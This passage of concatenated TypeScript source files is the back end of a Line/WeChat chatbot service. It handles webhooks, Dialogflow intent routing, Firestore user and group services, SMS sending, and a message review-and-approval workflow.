    // if (!memberSnapShot.empty) {
    let userMessage: ChatMessage = {
        id: receiver.id
    }
    // Key the chat thread by the id used on the delivery channel.
    if (channel == "Line") {
        userMessage.id = receiver.lineId
    } else if (channel == "WeChat") {
        userMessage.id = receiver.wechatId
    }
    await chatMessageService.setChatMessage(userMessage)
    const trackId = chatMessageService.getRecordDetailUUID(userMessage.id)
    const recordDetail: RecordDetail = {
        id: trackId,
        receiver: receiver,
        channel: channel as MessageTemplate['channel'],
        // Newlines are stored escaped so the message survives flat rendering.
        message: message.replace(/\n/g, "\\n"),
        urls: storageUrls || [],
        thumb: thumb || "",
        isSucceed: true,
        receiveTime: new Date().getTime(),
        read: true
    }
    return chatMessageService.setRecordDetail(userMessage.id, recordDetail)
    // }
}
/**
 * Find the first URL-looking substring (optionally with a path/query) in
 * `message`. Returns the regex exec result — the full match at index 0 —
 * or null when nothing URL-like is present.
 */
const getURLfromString = (message: string): string[] => {
    // A fresh pattern object is built on every call, so the /g flag's
    // stateful lastIndex never leaks between invocations.
    const urlPattern = new RegExp(/[-\w@:%\+.~#?&/=]{2,256}\.[a-z]{2,4}([\/?&/@:%\+.~#=][-\w]*)*/gi)
    return urlPattern.exec(message)
}
/**
 * Format a numeric value with thousands separators, e.g. 1234567 -> "1,234,567".
 * FIX: commas are inserted only in the integer part, so 1234.5678 renders as
 * "1,234.5678" instead of the original's "1,234.5,678" (the lookahead regex
 * also matched digit groups inside the fraction).
 * @param x number (or numeric string) to format
 * @returns the formatted string
 */
const numberWithCommas = (x) => {
    const [integerPart, fractionPart] = x.toString().split(".")
    const grouped = integerPart.replace(/\B(?=(\d{3})+(?!\d))/g, ",")
    return fractionPart === undefined ? grouped : grouped + "." + fractionPart
}
export default router<file_sep>/src/authorizationSubscriber.ts
import { actionSubscriber } from './actionSubscriber'
import { pushMessage } from './services/chatbotService'
import * as chatMessageService from './services/chatMessageService'
import * as memberService from "./services/memberService"
import { ChatMessage, Member, RecordDetail, MemberOrganization } from './model';
import * as config from './config';
import { Client, Message, FlexComponent, FlexMessage, FlexBox } from "@line/bot-sdk"
const dialogflow = require('dialogflow');
const projectId = config.DialogFlow.projectId;
const languageCode = config.DialogFlow.languageCode;
const sessionClient = new dialogflow.SessionsClient({ keyFilename: config.dialogflowPath });
/**
 * Send one user utterance to Dialogflow and resolve with the raw
 * detectIntent response array. The Line user id doubles as the Dialogflow
 * session id so conversation context sticks to that user.
 */
const detectIntent = (lineId: string, textMessage: string): Promise<any> => {
    const session = sessionClient.sessionPath(projectId, lineId)
    const request = {
        session: session,
        queryInput: {
            text: {
                text: textMessage,
                languageCode: languageCode,
            },
        },
    }
    return sessionClient.detectIntent(request)
}
/**
 * Run a user message through Dialogflow and dispatch the matched action to
 * the authorization layer. Unmatched intents become "unMatchOnce"; any
 * Dialogflow failure (including a rejected dispatch) falls back to the
 * "dialogFlowError" action.
 */
export const messageDispatcher = async (lineId: string, message: string): Promise<any> => {
    const startedAt = new Date()
    try {
        const responses = await detectIntent(lineId, message)
        const finishedAt = new Date()
        console.log("DialogFlow spent: ", finishedAt.getTime() - startedAt.getTime(), "ms")
        const result = responses[0].queryResult
        if (!result.intent) {
            console.log("Missing result.intent")
            // `return await` so a rejected dispatch is caught below, matching
            // the original .then/.catch chaining semantics.
            return await authorization(lineId, "unMatchOnce", null)
        }
        return await authorization(lineId, result.action, result)
    } catch (error) {
        console.log(`${lineId} Error in Dialogflow:${error}`)
        return authorization(lineId, "dialogFlowError", null)
    }
}
/**
 * Handle a Line postback event for a known member: build a Flex "reply"
 * bubble and push it, recording the reply in the chat history.
 *
 * NOTE(review): as written, `message` is always "" so `contents` is never
 * populated and the function always resolves without pushing anything — the
 * greeting/yes/no constants and the `session`/`course` locals look like
 * scaffolding for postback actions that were never wired up (see the
 * commented-out authorization call at the bottom). Confirm before relying
 * on this path.
 */
export const postbackDispatcher = async (userId: string, postback: any, params: any): Promise<any> => {
    const action = postback.action.toString()
    const type = postback.type || ""
    const contents: FlexComponent[] = []
    const greetingMessage = "學長您好!"
    const studentGreetings = "學員您好!"
    const thanksMessage = ",感謝您!"
    // const agreeMessage = greetingMessage + "已收到您的回覆,感謝您的參與!"
    // const declineMessage = greetingMessage + "已收到您無法參加的回覆,期待下次您的參與!"
    const yesMessage = "參加"
    const noMessage = "不克前往"
    // Virtual sender used when recording system-originated chat messages.
    const systemMember: Member = { id: "system", name: "", email: "", mobilePhone: "", lineId: "", wechatId: "", role: "staff", unReadMessages: 0 }
    let message = ""
    let session = ""
    let course: string[] = []
    // Flex bubble shell; `contents` above is its (currently empty) body.
    let flexMessage: FlexMessage = {
        type: "flex",
        altText: `回覆訊息`,
        contents: {
            type: "bubble",
            body: {
                type: "box",
                layout: "vertical",
                contents: contents
            }
        }
    }
    let memberSnapShot = await memberService.getMemberByAnyId(userId)
    if (!memberSnapShot.empty) {
        if (message != "") {
            contents.push(
                {
                    type: "box",
                    layout: "vertical",
                    contents: [
                        { type: "separator" },
                        {
                            type: "text",
                            text: message,
                            size: "md",
                            margin: "md",
                            wrap: true
                        }
                    ]
                },
                {
                    type: "separator",
                    margin: "md"
                }
            )
        }
        if (contents.length > 0) {
            await pushMessage(userId, flexMessage).then(success => {
                return chatMessageService.createChatMessage(systemMember, memberSnapShot.docs[0].data() as Member, "Line", message, [], "")
            })
        } else {
            return Promise.resolve()
        }
    }
    // return authorization(lineId, action, postback)
}
/**
 * Wrap a plain text message in a Line Flex vertical box, with a separator
 * line drawn above the wrapped text.
 */
const addTextBox = function (message: string): FlexBox {
    return {
        type: "box",
        layout: "vertical",
        contents: [
            { type: "separator" },
            { type: "text", text: message, size: "md", margin: "md", wrap: true }
        ]
    }
}
const addRecordDetail = function (userId: string, qText: string): RecordDetail {
const trackId = chatMessageService.getRecordDetailUUID(userId)
return {
id: trackId,
receiver: { id: "system", name: "", email: "", mobilePhone: "", lineId: "", wechatId: "", role: "staff", unReadMessages: 0 },
channel: "Line",
message: qText.replace(/\n/g, "\\n"),
isSucceed: true,
receiveTime: new Date().getTime(),
read: false
}
}
/**
 * Route a Dialogflow action (or a synthetic one) to the action subscriber
 * for the given Line user; the fallback intent is normalized to the internal
 * "unMatchOnce" action.
 * FIX: the original read `function async(...)`, which merely NAMES the
 * function "async" rather than making it asynchronous — declared as a plain
 * function since the body never awaits and already returns the subscriber's
 * promise.
 * @param lineId Line user id
 * @param action Dialogflow action name or synthetic action
 * @param dataResult dataResult from dialogflow result or postback data
 */
const authorization = function (lineId: string, action: string, dataResult: any) {
    console.log("In authorization: ", lineId)
    if (action == "Default Fallback Intent") {
        return actionSubscriber(lineId, "unMatchOnce", dataResult)
    }
    return actionSubscriber(lineId, action, dataResult)
}
<file_sep>/src/services/groupService.ts
import * as admin from 'firebase-admin';
import { Group } from '../model';

// Firestore collection of member groups (including Line chat groups).
const groupCollection = admin.firestore().collection("Group");

/** Fetch every group whose "type" field is "group" (Line chat groups). */
export const getLineGroups = function () {
    return groupCollection.where('type', '==', "group").get()
}

/**
 * Query groups by their Line group id.
 * (Parameter renamed from the misleading `companyName`.)
 */
export const getGroupBylineId = function (lineId: string) {
    return groupCollection.where("lineId", "==", lineId).get()
}

/** Query groups whose "id" field equals the given id. */
export const getGroupById = function (id: string) {
    return groupCollection.where("id", "==", id).get()
}

/** Query groups by display name. */
export const getGroupByName = function (name: string) {
    return groupCollection.where("name", "==", name).get()
}

/** Create or merge a group document keyed by its own id. */
export const setGroup = function (group: Group) {
    return groupCollection.doc(group.id).set(group, { merge: true })
}

/** Delete a group document by id. */
export const deleteGroup = function (id: string) {
    return groupCollection.doc(id).delete()
}
import * as admin from 'firebase-admin';
import { EventResult, Receiver } from "../model"
const eventCollection = admin.firestore().collection("Event");
export const createEvent = function (event: any) {
return eventCollection.doc(event.id).set(event, { merge: true })
}
export const updateEvent = (eventId: string, event: EventResult) => {
return eventCollection.doc(eventId).update(event)
}
export const createEventReceiver = (eventId: string, receiver: Receiver) => {
return eventCollection.doc(eventId).collection("Receiver").add(receiver)
}
export const getEvent = async (eventId: string): Promise<EventResult> => {
const snapshot = await eventCollection.doc(eventId).get();
if (snapshot.exists)
return snapshot.data() as EventResult;
return null;
}
export const getEventServices = async (eventId: string): Promise<Receiver[]> => {
const snapshot = await eventCollection.doc(eventId).collection("Receiver").get();
return snapshot.docs.map(doc => {
return doc.data() as Receiver;
});
}<file_sep>/src/userWS.ts
import { Router } from "express"
import { v4 as uuidv4 } from "uuid"
import * as XLSX from 'xlsx'
import * as admin from 'firebase-admin';
import * as userService from "./services/userService"
import { User, Group, BatchGroup } from "./model"
const router = Router()
// Import back-office users from an uploaded XLSX (base64 data URL in
// req.body.file). Row format (first row is a header): 0=name 1=email 2=role
// (defaults to "staff"). Each parsed row is handed to createUser (defined
// later in this file), which is expected to handle existing accounts.
router.post("/importUsers", async (req, res) => {
    let base64String = req.body.file;
    let base64Image = base64String.split(';base64,').pop();
    /* data is a node Buffer that can be passed to XLSX.read */
    let workbook = XLSX.read(base64Image, { type: 'base64' });
    let data: string[][] = XLSX.utils.sheet_to_json(workbook.Sheets[workbook.SheetNames[0]], { header: 1 });
    let userUploads = new Array<User>()
    for (let i = 1; i < data.length; i++) {
        let cols = data[i]
        if (cols.length >= 3) {
            let newData = {
                name: cols[0] || "",
                email: cols[1] || "",
                role: cols[2] || "staff"
            }
            userUploads.push({
                id: uuidv4(),
                name: newData.name.toString().trim(),
                email: newData.email.toString().trim(),
                role: newData.role.toString().trim() as User['role']
            })
        }
    }
    for (let userUpload of userUploads) {
        /**
         * Check whether the User master record exists
         */
        await createUser(userUpload)
        console.log("--------------------------------------------------")
    }
    res.sendStatus(200)
})
// POST /createUser — create a single user (and its Firebase Auth account).
// Responds 200 with the created user, or 403 on any failure.
router.post("/createUser", async (req, res) => {
    const content: User = req.body
    console.log("createUser:", content)
    // Normalize incoming fields. The uuid is provisional; createUser() may
    // overwrite it with the Firebase Auth uid.
    let userUpload: User = {
        id: uuidv4(),
        name: content.name.toString().trim(),
        email: content.email.toString().trim(),
        role: content.role.toString().trim() as User['role']
    }
    // Previously the result of an await-ed .then()/.catch() chain was bound to
    // an unused variable; plain try/catch is clearer and equivalent.
    try {
        const created = await createUser(userUpload)
        res.status(200).send(created)
    } catch (err) {
        res.sendStatus(403)
    }
    console.log("--------------------------------------------------")
})
// PUT /updateUser — merge non-empty fields from the request body into an
// existing user. Always responds 200 (even when the user does not exist).
router.put("/updateUser", async (req, res) => {
    const content: User = req.body
    console.log("updateUser:", content)
    let userUpload: User = {
        id: content.id.toString().trim(),
        name: content.name.toString().trim(),
        email: content.email.toString().trim(),
        role: content.role.toString().trim() as User['role']
    }
    /**
     * Check whether the User master record exists
     */
    const userSnapshot = await userService.getUserById(userUpload.id)
    if (!userSnapshot || userSnapshot == null) {
        console.log("====User不存在====")
        // Missing user: only a fallback id is assigned here.
        // NOTE(review): no document is actually written in this branch — confirm
        // whether "create on update" was intended.
        if (!userUpload.id || userUpload.id == "") {
            userUpload.id = uuidv4()
        }
    } else {
        // Copy only the non-empty incoming fields onto the stored user.
        let user = userSnapshot
        if (userUpload.email && userUpload.email !== "") {
            user.email = userUpload.email
        }
        if (userUpload.name && userUpload.name !== "") {
            user.name = userUpload.name
        }
        if (userUpload.role) {
            user.role = userUpload.role
        }
        await userService.setUser(user)
    }
    console.log("--------------------------------------------------")
    res.sendStatus(200)
})
// DELETE /deleteUser/:userId — remove the user document and its Firebase Auth
// account. 403 when the user does not exist or auth deletion fails.
router.delete("/deleteUser/:userId", async (req, res) => {
    const userId: string = req.params.userId || ""
    console.log("deleteUser:", userId)
    /**
     * Check whether the User master record exists
     */
    const userSnapshot = await userService.getUserById(userId.toString().trim())
    if (!userSnapshot || userSnapshot == null) {
        console.log("====User不存在====")
        res.sendStatus(403)
    } else {
        let user = userSnapshot
        await userService.deleteUser(user.id)
        // NOTE(review): the Firestore doc id is assumed to equal the Firebase
        // Auth uid (createUser() assigns it that way) — verify for legacy users.
        await deleteFirebaseAccount(userId).then(success => {
            res.status(200).send(success)
        }).catch(err => {
            res.sendStatus(403)
        })
    }
    console.log("--------------------------------------------------")
})
/** Create a Firebase Auth account; resolves with the created UserRecord. */
function createFirebaseAccount(email: string, password: string, name: string) {
    return admin.auth().createUser({
        email: email,
        password: <PASSWORD>,
        displayName: name
    });
}
/** Delete the Firebase Auth account with the given uid. */
function deleteFirebaseAccount(uid: string) {
    return admin.auth().deleteUser(uid)
}
/** Look up a Firebase Auth account by email; rejects when none exists. */
function getFirebaseAccount(email: string) {
    return admin.auth().getUserByEmail(email)
}
/**
 * Ensure a user exists in both the User collection and Firebase Auth.
 *
 * Behavior:
 *  - If no User doc matches the email, look up (or create, with a random
 *    password) the Firebase Auth account, adopt its uid as the doc id, and
 *    write the User doc.
 *  - If a User doc already exists, nothing is written and the input is
 *    returned unchanged.
 *
 * Rejects when Firebase account creation fails.
 *
 * Refactor notes: the previous version wrapped everything in `new Promise`
 * with an async executor, called `reject()` with no reason, and then still
 * fell through to `resolve()`. Plain async/await propagates errors instead.
 */
async function createUser(userUpload: User): Promise<User> {
    const userSnapshot = await userService.getUserByEmail(userUpload.email)
    if (userSnapshot.empty) {
        console.log("====User不存在====")
        // Reuse an existing auth account when one matches the email.
        const existingAuth = await getFirebaseAccount(userUpload.email).catch(() => null)
        if (!existingAuth || existingAuth == null) {
            // No auth account yet: create one with a throwaway random password.
            const firebaseAuthInfo = await createFirebaseAccount(userUpload.email, uuidv4(), userUpload.name)
            userUpload.id = firebaseAuthInfo.uid
            await userService.setUser(userUpload)
        } else {
            userUpload.id = existingAuth.uid
            await userService.setUser(userUpload)
        }
    }
    return userUpload
}
export default router<file_sep>/src/services/smsService.ts
import Axios from "axios"
import { every8dConfig } from "../config"
import { Member } from "../model"
/**
 * Send an SMS through the every8d HTTP gateway.
 * Returns the raw Axios response promise for the caller to inspect.
 */
export const pushMessage = (mobilePhone: string, message: string): Promise<any> => {
    const requestParams = {
        UID: every8dConfig.UID,
        PWD: <PASSWORD>,
        DEST: mobilePhone,
        MSG: message
    }
    return Axios.get("https://oms.every8d.com/API21/HTTP/sendSMS.ashx", { params: requestParams })
}
/**
 * Prefix a chat message with the sender's name (and organizational path, when
 * present) for SMS delivery. Returns null for an empty/undefined message.
 */
export const toSMSMessage = (sender: Member, message: string): string | null => {
    if (message) {
        // 《來自X》 header tells the recipient who pushed the message.
        let smsMessage = `《來自${sender.name}》\n`
        if (sender.path)
            smsMessage += sender.path + "\n"
        return smsMessage + message
    }
    return null
}<file_sep>/src/reviewMessageWS.ts
import { Router } from "express"
import { v4 as uuidv4 } from "uuid"
import * as PubSub from "@google-cloud/pubsub"
import * as Moment from "moment-timezone"
import * as Queue from "bull"
import * as reviewMessageService from "./services/reviewMessageService"
import * as eventService from "./services/eventService"
import { User, ReviewMessage, Receiver, EventResult } from "./model"
import { pubsubConfig, MODE, redisConfig } from './config'
const queue = new Queue(redisConfig.name, { redis: redisConfig })
const pubsub = PubSub({ keyFilename: pubsubConfig.serviceAccountPath })
const router = Router()
// POST /createReviewMessage — stage a message for review before delivery.
// The message starts in state 0 (pending) and its receivers are stored in a
// sub-collection with a 1-based `index`. 403 when the body is missing or the
// scheduled time is already in the past.
router.post("/createReviewMessage", async (req, res) => {
    let reviewMessage = req.body as ReviewMessage & { receivers: Receiver[] } //{ receivers: { id: string, data: any[] }[] }
    if (reviewMessage) {
        const now = new Date().getTime()
        if (reviewMessage.expectTime > now) {
            const newReviewMessage = {
                id: uuidv4(),
                state: 0,
                content: reviewMessage.content,
                channel: reviewMessage.channel,
                sender: reviewMessage.sender,
                expectTime: reviewMessage.expectTime,
                urls: reviewMessage.urls,
                type: reviewMessage.type,
                auditor: null,
                receiverCount: reviewMessage.receivers.length
            } as ReviewMessage
            await reviewMessageService.createReviewMessage(newReviewMessage).then(async success => {
                // Store every receiver in parallel; index is 1-based.
                const promiseArr = new Array<Promise<any>>()
                for (let index = 0; index < reviewMessage.receivers.length; index++) {
                    let receiver = reviewMessage.receivers[index]
                    receiver['index'] = index + 1
                    promiseArr.push(reviewMessageService.createReviewMessageReceivers(newReviewMessage.id, receiver))
                }
                await Promise.all(promiseArr)
                res.sendStatus(200)
            }).catch(err => {
                res.sendStatus(403)
            })
            // for (let index = 0; index < 50; index++) {
            //     newReviewMessage.id = uuidv4()
            //     await reviewMessageService.createReviewMessage(newReviewMessage).then(async success => {
            //         const promiseArr = new Array<Promise<any>>()
            //         for (const receiver of reviewMessage.receivers)
            //             promiseArr.push(reviewMessageService.createReviewMessageReceivers(newReviewMessage.id, receiver))
            //         await Promise.all(promiseArr)
            //     }).catch(err => {
            //         res.sendStatus(403)
            //     })
            // }
            // res.sendStatus(200)
        } else
            res.status(403).send("The expect time is over")
    } else {
        res.sendStatus(403)
    }
})
// POST /updateReviewMessage — overwrite/merge an existing review message with
// the request body as-is. 403 when the body is missing or the write fails.
router.post("/updateReviewMessage", async (req, res) => {
    const reviewMessageUpload = req.body as ReviewMessage
    console.log(JSON.stringify(reviewMessageUpload, null, 4))
    if (reviewMessageUpload && reviewMessageUpload != null) {
        const newReviewMessage: ReviewMessage = {
            ...reviewMessageUpload
        }
        await reviewMessageService.setReviewMessage(newReviewMessage).then(success => {
            res.sendStatus(200)
        }).catch(err => {
            res.sendStatus(403)
        })
    } else {
        res.sendStatus(403)
    }
})
// PUT /updateReviewMessageState/:id/:state — set only the numeric state of an
// existing review message. 403 when the message is not found.
router.put("/updateReviewMessageState/:reviewMessageId/:state", async (req, res) => {
    const id = req.params.reviewMessageId as string
    const state = parseInt(req.params.state)
    let reviewMessage = await reviewMessageService.getReviewMessageById(id)
    if (reviewMessage) {
        let newReviewMessage = {
            id, state
        } as ReviewMessage
        await reviewMessageService.setReviewMessage(newReviewMessage)
        res.sendStatus(200)
    } else
        res.sendStatus(403)
})
// DELETE /deleteReviewMessage/:id — remove the review message document.
router.delete("/deleteReviewMessage/:reviewMessageId", async (req, res) => {
    const id = req.params.reviewMessageId as string
    await reviewMessageService.deleteReviewMessage(id).then(success => {
        res.sendStatus(200)
    }).catch(err => {
        res.sendStatus(403)
    })
})
// POST /reject/:id — auditor rejects the message: state becomes 3 and the
// authenticated user (populated by auth middleware on req["user"]) is recorded.
router.post("/reject/:reviewMessageId", async (req, res) => {
    const id = req.params.reviewMessageId as string
    const author: User = req["user"]
    let reviewMessage = await reviewMessageService.getReviewMessageById(id)
    if (reviewMessage) {
        let newReviewMessage = {
            id: reviewMessage.id,
            state: 3,
            auditor: author
        } as ReviewMessage
        await reviewMessageService.setReviewMessage(newReviewMessage)
        res.sendStatus(200)
    } else
        res.sendStatus(403)
})
// POST /agree/:id — auditor approves the message (state 1), then dispatches it:
//  * type "delay": schedule a one-shot Bull job with a cron derived from
//    expectTime (seconds forced to 0).
//  * type "immediate": materialize an Event (plus its receivers) and publish
//    its id to Pub/Sub; state then advances to 2 (sent).
// Responds 200 with the computed cron string, 403 on failure or missing message.
router.post("/agree/:reviewMessageId", async (req, res) => {
    const id = req.params.reviewMessageId as string
    const author: User = req["user"]
    let reviewMessage = await reviewMessageService.getReviewMessageById(id)
    if (reviewMessage) {
        let newReviewMessage = {
            id: reviewMessage.id,
            state: 1,
            auditor: author
        } as ReviewMessage
        await reviewMessageService.setReviewMessage(newReviewMessage).then(async success => {
            // const moment = Moment(newReviewMessage.expectTime, "yyyy-MM-DD HH:mm:ss").tz("Asia/Taipei")
            const moment = Moment(reviewMessage.expectTime)//.tz("Asia/Taipei")
            const ss = 0//moment.second()
            const mm = moment.minute()
            const hh = moment.hour()
            const dd = moment.date()
            const mon = moment.month() + 1
            const yy = moment.year()
            // Bull cron format: sec min hour day month dayOfWeek year.
            const cron = ss + " " + mm + " " + hh + " " + dd + " " + mon + " * " + yy
            console.log(cron)
            if (reviewMessage.type.toLowerCase() == "delay") {
                // jobId = message id, so re-approving the same message cannot
                // enqueue a duplicate job.
                const result = await queue.add({
                    id: reviewMessage.id,
                    timeStamp: new Date().getTime()
                }, { // 秒 分 時 日 月 年
                    repeat: { cron: cron },
                    jobId: reviewMessage.id//uuidv4()
                })
            } else if (reviewMessage.type.toLowerCase() == "immediate") {
                let newEvent: EventResult = {
                    id: uuidv4(),
                    messageId: [],
                    content: reviewMessage.content,
                    urls: reviewMessage.urls || [],
                    channel: reviewMessage.channel,
                    sender: reviewMessage.sender,
                    // receivers: await reviewMessageService.getReviewMessageReceivers(reviewMessage.id),
                    timeStamp: new Date().getTime()
                }
                await eventService.createEvent(newEvent)
                // Copy the review-message receivers onto the new event.
                const receivers = await reviewMessageService.getReviewMessageReceivers(reviewMessage.id)
                const memberCheckExecu = new Array<Promise<any>>()
                for (const receiver of await receivers)
                    memberCheckExecu.push(eventService.createEventReceiver(newEvent.id, receiver))
                await Promise.all(memberCheckExecu)
                // The Pub/Sub payload carries only the event id + timestamp;
                // the subscriber reloads the full event from Firestore.
                const data = Buffer.from(JSON.stringify({
                    id: newEvent.id,
                    timeStamp: newEvent.timeStamp
                }))
                console.log("pub data", {
                    id: newEvent.id,
                    timeStamp: newEvent.timeStamp
                })
                await pubsub.topic(pubsubConfig.topicName + pubsubConfig.messageTopicName).publisher().publish(data)
                newReviewMessage.state = 2
                await reviewMessageService.setReviewMessage(newReviewMessage)
            }
            res.status(200).send(cron)
        }).catch(err => {
            console.log("sending failed", err)
            res.sendStatus(403)
        })
    } else {
        console.log("review message not found")
        res.sendStatus(403)
    }
})
export default router<file_sep>/src/chatbotWS.ts
import { Router } from "express"
import * as Line from '@line/bot-sdk';
import { LINE, monitorGroupId, wechatAccount, uriName, appName } from './config';
import { Stream } from 'stream';
import * as fs from 'fs'
import axios from "axios"
import * as wechat from 'wechat'
import { createHash } from "crypto"
import * as mime from "mime"
import { messageDispatcher, postbackDispatcher } from './authorizationSubscriber'
import { getMemberByAnyId, setMember, deleteFirebaseToken } from './services/memberService';
import * as lineService from './services/lineService';
const queryString = require('query-string');
let path = require("path");
const router = Router()
// POST /lineWebhook — LINE Messaging API webhook.
// Validates the x-line-signature, then dispatches each event:
//  * follow            -> treated as a "註冊" (register) text command
//  * message (user)    -> text goes to messageDispatcher; media is fetched from
//                         the LINE content API and saved under lib/ (<=10 MB)
//  * postback          -> parsed querystring handed to postbackDispatcher
//  * join (group)      -> sends a group-binding button template
// Always answers 200 so LINE does not retry.
router.post('/lineWebhook', (req, res) => {
    console.log("webhook");
    const signature = req.headers["x-line-signature"];
    if (Line.validateSignature(JSON.stringify(req.body), LINE.channelSecret, signature as string)) {
        const events = req.body.events;
        let responseArray: Promise<any>[] = [];
        let t2, t3;
        events.forEach(async (event) => {
            console.log(JSON.stringify(event, null, 4));
            console.log("event.type", event.type)
            let lineId = event.source.userId
            let fileName = ""
            switch (event.type) {
                case 'follow':
                    messageDispatcher(lineId, "註冊")
                    break;
                case 'unfollow':
                    // responseArray.push(memberUnfollow(lineId))
                    break;
                case 'message':
                    if (event.source.type == 'user') {
                        // from user in line@, not from group
                        switch (event.message.type) {
                            case "text":
                                responseArray.push(messageDispatcher(lineId, event.message.text))
                                break;
                            case "sticker":
                                break;
                            case "file":
                            case "image":
                            case "video":
                            case "audio":
                                // Media: prefer the original file name (without
                                // extension); fall back to the message id.
                                if (event.message.hasOwnProperty('fileName')) {
                                    fileName = event.message.fileName.substring(0, event.message.fileName.lastIndexOf("."))
                                } else {
                                    fileName = event.message.id
                                }
                                const result = await axios.get(`https://api.line.me/v2/bot/message/${event.message.id}/content`, {
                                    responseType: "stream",
                                    headers: {
                                        "Authorization": "Bearer " + LINE.channelAccessToken,
                                    }
                                }).catch(error => {
                                    if (error.hasOwnProperty("response")) {
                                        if (error.response.hasOwnProperty("status")) {
                                            console.log("Get content failed with status code:", error.response.status + error.response.statusText)
                                        } else {
                                            console.log("Get content failed with no status code")
                                        }
                                    } else {
                                        console.log("Get content failed with no response")
                                    }
                                    return null
                                })
                                if (result != null) {
                                    const stream = result.data as Stream
                                    console.log(result.headers['content-type']);
                                    let msg = result.headers['content-type'];
                                    // Derive a file extension from the MIME type.
                                    let extention = mime.getExtension(result.headers['content-type'])
                                    let length = result.headers['content-length'];
                                    console.log("length:", length)
                                    // Hard 10 MB cap on accepted media.
                                    if (length > 10485760) {
                                        console.log("很抱歉,您傳送的檔案超過 10 MB,目前無法接收。請您留言需要協助的事項,我們會儘快跟您聯絡。謝謝您!");
                                    } else {
                                        // Accumulate chunks; write once the full
                                        // content-length has arrived.
                                        let buffer = new Buffer(0);
                                        stream.on('data', (chunk) => {
                                            buffer = Buffer.concat([buffer, chunk]);
                                            if (buffer.length >= length) {
                                                fs.writeFileSync('lib/' + Date.now() + fileName + "." + extention, buffer);
                                            }
                                        });
                                        stream.on('error', (err) => {
                                            console.log(err);
                                        });
                                    }
                                }
                                break;
                            case "location":
                                break;
                            default:
                                break;
                        }
                    }
                    console.log(lineId + " " + event.message.text)
                    break;
                case 'postback':
                    const postback = queryString.parse(event.postback.data)
                    responseArray.push(postbackDispatcher(lineId, postback, event.postback.params))
                    break
                case 'join':
                    // Invite the group to fill in the binding form so the bot
                    // learns which organization the group belongs to.
                    let groupWelcome: Line.Message = {
                        "type": "template",
                        "altText": "This is a buttons template",
                        "template": {
                            "type": "buttons",
                            "text": `我是《${appName}》很高興受邀加入貴群組,請你填表幫我長智慧,讓我知道這個群組的相關資`,
                            "actions": [
                                {
                                    "type": "uri",
                                    "label": "點選前往",
                                    "uri": `${uriName}groupBinding/${event.source.groupId}`
                                }
                            ]
                        }
                    }
                    lineService.pushMessage(event.source.groupId, groupWelcome)
                    break
                default:
                    break;
            }
        });
        t2 = new Date();
        Promise.all(responseArray)
            .then(() => {
                t3 = new Date();
                console.log("Webhook Response Time:", t3.getTime() - t2.getTime());
                res.status(200).send("OK")
            })
            .catch(err => {
                console.log(err);
                res.status(200).send("not OK");
            });
    } else {
        res.status(200).send("OK")
    }
}); // end of lineWebhook
// /wechatWebhook — WeChat Official Account webhook (wrapped by the `wechat`
// middleware, which parses/validates the XML payload onto req.weixin).
// GET is the platform's signature handshake; POST carries user events:
//  * subscribe   -> treated as a "註冊" (register) text command
//  * unsubscribe -> flags the member as unfollowed
//  * text        -> forwarded to messageDispatcher
router.use('/wechatWebhook', wechat(wechatAccount.callbackToken, function (req, res) {
    console.log("wechatwebhook:", req.body);
    let responseArray: Promise<any>[] = [];
    let arr = [];
    let t1, t2, t3;
    t1 = new Date();
    if (req.method.toLowerCase() === "get") {
        // Handshake: sha1(sorted(token, timestamp, nonce)) must match the
        // signature; echo back echostr to confirm ownership of the endpoint.
        const shasum = createHash("sha1")
        shasum.update([wechatAccount.callbackToken, req.query.timestamp, req.query.nonce].sort().join(""))
        const signature = shasum.digest("hex")
        if (signature !== req.query.signature)
            return res.status(403).end()
        else
            res.status(200).send(req.query.echostr)
    } else {
        const event = req.weixin
        const userId = event.FromUserName
        console.log(JSON.stringify(event, null, 4))
        switch (event.MsgType) {
            case "event":
                switch (event.Event) {
                    case "subscribe":
                        console.log("follow*---------")
                        messageDispatcher(userId, "註冊")
                        break
                    case "unsubscribe":
                        responseArray.push(memberUnfollow(userId))
                        break
                    case "CLICK":
                        switch (event.EventKey) {
                            default:
                                break
                        }
                        break;
                }
                break
            case "text":
                responseArray.push(messageDispatcher(userId, event.Content))
                break
        }
        // Empty reply = acknowledge without sending a passive response.
        res.reply("")
    }
    t2 = new Date();
    Promise.all(arr)
        .then(() => {
            t3 = new Date();
            console.log("D2:", t3.getTime() - t2.getTime());
        })
        .catch(err => {
            console.log(err);
        });
})); // end of wechatWebhook
// /wechatRedir — serve the static WeChat OAuth redirect page.
router.use('/wechatRedir', async function (req, res) {
    if (req.hasOwnProperty("body")) {
        console.log('Has body wechatRedir.html:', req.body)
    } else {
        console.log('Request body not found wechatRedir.html:')
    }
    res.sendFile(path.join(__dirname + '/../serviceAccount/wechatRedir.html'));
})
/**
 * Mark a member as unfollowed and revoke their Firebase token.
 *
 * Resolves with the lineId on successful cleanup, or null when the member is
 * unknown / already flagged / token deletion failed.
 *
 * BUG FIX: the token-deletion chain was previously fire-and-forget, so callers
 * (e.g. the WeChat webhook awaiting this promise) could resolve before the
 * cleanup finished and any rejection went unobserved. The chain is now
 * returned so it participates in the caller's await.
 */
const memberUnfollow = (lineId: string): Promise<any> => {
    return getMemberByAnyId(lineId).then(result => {
        if (result.empty) {
            // Unknown (never registered) user unfollowed — nothing to clean up.
            // sendToBigQuery(lineId, "未註冊", "未註冊", "unfollow")
            return null
        }
        const user = result.docs[0].data() as any
        // Skip members already flagged to avoid redundant writes.
        if (user["unfollow"] && user["unfollow"] != false) {
            return null
        }
        user["unfollow"] = true
        setMember(user)
        return deleteFirebaseToken(user.lineId).then((deleted: any) => {
            console.log(`${user.name} unfollowed`)
            return lineId
        }).catch((error: any) => {
            console.log("unfollow error:", error)
            return null
        })
    })
}
export default router<file_sep>/src/services/loginService.ts
import axios from 'axios'
import * as memberService from './memberService';
import * as sheetService from './sheetService'
/**
 * Append one customer row to the "users" sheet of the shared spreadsheet.
 * NOTE(review): the spreadsheet id is hard-coded — consider moving it to config.
 */
export const appendCustomer = async (result) => {
    let auth = await sheetService.authorize()
    let range = encodeURI('users!A2:E')
    return sheetService.appendSheet(auth, "19k-1kkOUORnJzIGBHJbpXqPaxrs3zTgZeX_LA3ZOMp4", range, result)
}
/**
 * Temporary login: looks the member up by mobile phone (currently passed in
 * the `password` field) and resolves with the member document.
 * Rejects with "手機輸入錯誤!" when no member matches.
 *
 * NOTE(review): `personalId` and `lineId` are unused but kept for interface
 * compatibility with existing callers.
 *
 * Refactor notes: the previous version used `new Promise` with an async
 * executor; if the Firestore query rejected, the promise never settled.
 * Plain async/await propagates that failure to the caller.
 */
